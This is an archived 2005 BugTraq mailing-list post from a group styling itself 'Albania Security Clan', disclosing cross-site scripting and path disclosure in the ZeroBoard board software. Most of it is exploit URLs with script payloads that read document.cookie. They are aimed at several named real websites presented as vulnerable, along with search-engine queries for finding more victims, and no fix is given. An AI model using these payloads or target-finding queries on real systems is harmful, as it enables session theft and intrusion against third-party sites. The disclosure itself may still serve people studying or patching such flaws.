Multiples vulnerability in ZeroBoard,

To: "securityfocus.com" <BugTraq@xxxxxxxxxxxxxxxxx>
Subject: Multiples vulnerability in ZeroBoard,
From: "albanian haxorz" <asc@xxxxxxxxxxxxxxxxxx>
Date: Sat, 19 Feb 2005 18:15:48 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-
*'^'~*-,._."
".,-*-
,._                                                                    
                    -.,-*-,."
".,-*-,._                  ALBANIA SECURITY 
CLAN                            -.,-*-,."
".,-*-
,._                                                                    
                    -.,-*-,."
".,-*-
,._          ...::www.albanianhaxorz.org::...                          
      -.,-*-,."
".,-*-,.-
                                                                       
                 -.,-*-,."
".,-*-,.-               PROUD TO BE 
ALBANIAN                                 -.,-*-,."
".,-*-
,._                                                                    
                   -.,-*-,."
".,-*-,._               Long Live Ethnic 
Albania                                   -.,-*-,."
".,-*-
,._                                                                    
                   -.,-*-,."
".,-*-,._    Copyright (c) 2005 ASC irc.gigachat.net #ASC            -
.,-*-,."
".,-*-
,._                                                                    
                   -.,-*-,."
".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-
*'^'~*-,._."

Multiples vulnerability in ZeroBoard,

* Exploits *:

http://victime.al/dir/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
(Cross Site Scripting and XSS for found websites with this bugs >>> 
www.google.com // */zboard.php?id=gallery )

>>> http://www.edu-sky.co.kr/board/zboard.php?id=gallery&sn1=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

|

http://victime.al/bbs or zboard/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
(Path disclosure and Cross Site Scripting and XSS )

>>> http://union.snu.ac.kr/bbs/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

|

http://victime.al/bbs or zboard/skin/dir/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E
( Cross Site Scripting and XSS for found websites with this bugs >>> 
www.google.com // */zboard/skin/***/view_image.php? )

>>> http://mytheme.net/zboard/skin/nzeo4_pds/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

|

http://victim.al/bbs or zboard/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
( Cross Site Scripting edhe XSS for found websites with this bugs >>> 
www.google.com // */***/zboard.php?id=link&page= )

>>> http://jina1110.oolim.net/zboard/bbs/zboard.php?
id=link&page=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

* Vendor *

http://www.zeroboard.com/


www.albanianhaxorz.org | irc.gigachat.net -j #ASC
ALBANIA SECURITY CLAN, ALBANIAN RULEZZZ.

Prev by Date: Re: SHA-1 broken
Next by Date: Re: Joint encryption?
Previous by thread: Re: Joint encryption?
Next by thread: [ GLSA 200502-27 ] gFTP: Directory traversal vulnerability
Index(es):
- Date
- Thread